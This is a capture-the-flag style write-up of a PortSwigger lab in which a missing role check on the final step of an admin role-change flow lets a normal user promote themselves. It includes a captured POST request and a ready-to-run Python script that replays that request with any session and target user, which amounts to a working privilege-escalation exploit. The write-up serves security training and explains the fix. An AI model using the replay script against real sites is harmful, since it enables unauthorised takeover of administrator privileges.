PortSwigger Lab: Multi-step process with no access control on one step

Jun Takemura · March 6, 2025

Task

This lab has an admin panel with a flawed multi-step process for changing a user’s role. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

Attempt

First let’s understand how the multi-step process for changing a user’s role works.

  1. Log in as administrator
  2. Go to the admin panel
  3. Select a user
  4. Press the ‘upgrade user’ button
  5. Press ‘yes’ when prompted ‘Are you sure?’
  6. The user’s role is set to admin
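The list above is the flow as an administrator sees it. What makes the lab solvable is where in that flow the role check actually runs. The Python below is a constructed model of the flow, added here to illustrate the point; it is not PortSwigger's code, and the session cookie values (ADMIN_COOKIE, WIENER_COOKIE) and the in-memory role table are made up for the example. It shows the handler for the final step once as the lab behaves (only a valid session is required) and once with the role check repeated on that step, and replays the confirmed step 5 request as wiener against each.

```python
# Constructed model of the lab's multi-step role change (not PortSwigger's code).
# Session cookie values, users and roles below are made up for this example.
from typing import Callable, Dict, Optional, Tuple

Role = str
Response = Tuple[int, str]  # (HTTP status, body or redirect target)

# Constructed state: which session cookie belongs to which user, and each user's role.
SESSIONS: Dict[str, str] = {"ADMIN_COOKIE": "administrator", "WIENER_COOKIE": "wiener"}
INITIAL_ROLES: Dict[str, Role] = {"administrator": "admin", "wiener": "user", "carlos": "user"}


def current_user(session: str) -> Optional[str]:
    """Resolve a session cookie to a username; None if the session is unknown."""
    return SESSIONS.get(session)


def is_admin(roles: Dict[str, Role], session: str) -> bool:
    """True only for a valid session whose user currently holds the admin role."""
    user = current_user(session)
    return user is not None and roles.get(user) == "admin"


def admin_panel(roles: Dict[str, Role], session: str) -> Response:
    """GET /admin (step 2): this is where the flow enforces the role check."""
    if not is_admin(roles, session):
        return 401, "Unauthorized"
    return 200, "admin panel"


def apply_role_change(roles: Dict[str, Role], form: Dict[str, str]) -> Response:
    """Steps 4 to 6: shared form handling, run after the caller's access check (if any)."""
    if form.get("action") != "upgrade" or form.get("username") not in roles:
        return 400, "Bad request"
    if form.get("confirmed") != "true":
        return 200, "Are you sure?"  # step 5 prompt, nothing changed yet
    roles[form["username"]] = "admin"  # step 6: the role is actually changed here
    return 302, "/admin"


def admin_roles_vulnerable(roles: Dict[str, Role], session: str, form: Dict[str, str]) -> Response:
    """POST /admin-roles as in the lab: any valid session may run the final step."""
    if current_user(session) is None:
        return 401, "Unauthorized"
    return apply_role_change(roles, form)


def admin_roles_fixed(roles: Dict[str, Role], session: str, form: Dict[str, str]) -> Response:
    """POST /admin-roles with the same role check as the admin panel repeated here."""
    if not is_admin(roles, session):
        return 401, "Unauthorized"
    return apply_role_change(roles, form)


def run_exploit(handler: Callable[..., Response]) -> Tuple[int, Role]:
    """Replay the confirmed step 5 request as wiener against a fresh copy of the role table."""
    roles = dict(INITIAL_ROLES)
    form = {"action": "upgrade", "confirmed": "true", "username": "wiener"}
    status, _ = handler(roles, "WIENER_COOKIE", form)
    return status, roles["wiener"]


if __name__ == "__main__":
    print("vulnerable handler:", run_exploit(admin_roles_vulnerable))  # (302, 'admin')
    print("fixed handler:     ", run_exploit(admin_roles_fixed))       # (401, 'user')
```

The fix is the whole lesson of the lab: every request in a multi-step process has to re-check authorization, because the client can send any step on its own. Checking once when the admin panel is rendered protects the HTML, not the state change.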

Pressing ‘yes’ in step 5 sends the request below (the lab ID and the session cookie value are replaced with placeholders):

POST /admin-roles HTTP/2
Host: ID.web-security-academy.net
Cookie: session=COOKIE
Content-Length: 45
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ID.web-security-academy.net/admin-roles
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i

action=upgrade&confirmed=true&username=carlos

The role check is applied when you open the admin panel, but not when this final request is processed. So although a non-admin user cannot load the admin panel, they can send the POST above directly. Sending it with wiener’s session cookie and username=wiener instead of username=carlos promoted wiener to administrator and solved the lab.
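The replay can be scripted with nothing but the standard library. The script below is an added example, not the post author's code: it takes the lab host and the session cookie value of an already logged-in wiener (both obtained from Burp, as in the capture above), sends the step 5 POST for a chosen username, then requests /admin with the same cookie so you can see whether the promotion took effect. The target user, paths and form fields are taken from the captured request; the command-line interface is an assumption of this example.

```python
# Added example: replay the final step of the role-change flow with a non-admin
# session. Not the post author's script; host and session are supplied by the caller.
import argparse
import http.client
import urllib.parse


def build_upgrade_form(username: str) -> str:
    """Form body of the captured step 5 request, for an arbitrary target user."""
    return urllib.parse.urlencode(
        {"action": "upgrade", "confirmed": "true", "username": username}
    )


def post_admin_roles(host: str, session: str, username: str, timeout: float = 10.0) -> int:
    """Send the confirmation POST directly, skipping the admin panel. Returns the HTTP status."""
    body = build_upgrade_form(username)
    conn = http.client.HTTPSConnection(host, timeout=timeout)
    try:
        conn.request(
            "POST",
            "/admin-roles",
            body=body,
            headers={
                "Cookie": f"session={session}",
                "Content-Type": "application/x-www-form-urlencoded",
                "Content-Length": str(len(body)),
            },
        )
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection can be closed cleanly
        return resp.status
    finally:
        conn.close()


def admin_panel_status(host: str, session: str, timeout: float = 10.0) -> int:
    """GET /admin with the same session; a 200 means the session now has admin access."""
    conn = http.client.HTTPSConnection(host, timeout=timeout)
    try:
        conn.request("GET", "/admin", headers={"Cookie": f"session={session}"})
        resp = conn.getresponse()
        resp.read()
        return resp.status
    finally:
        conn.close()


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="Replay the unprotected confirmation step.")
    ap.add_argument("host", help="lab host, e.g. ID.web-security-academy.net")
    ap.add_argument("session", help="session cookie value of the logged-in wiener user")
    ap.add_argument("--user", default="wiener", help="account to promote (default: wiener)")
    args = ap.parse_args()
    print("POST /admin-roles ->", post_admin_roles(args.host, args.session, args.user))
    print("GET /admin        ->", admin_panel_status(args.host, args.session))
```

The body for username=carlos is 45 bytes long, matching the Content-Length in the captured request. A GET of /admin that returns 200 after the POST is the same check the lab uses for success: the session that could not open the admin panel before now can.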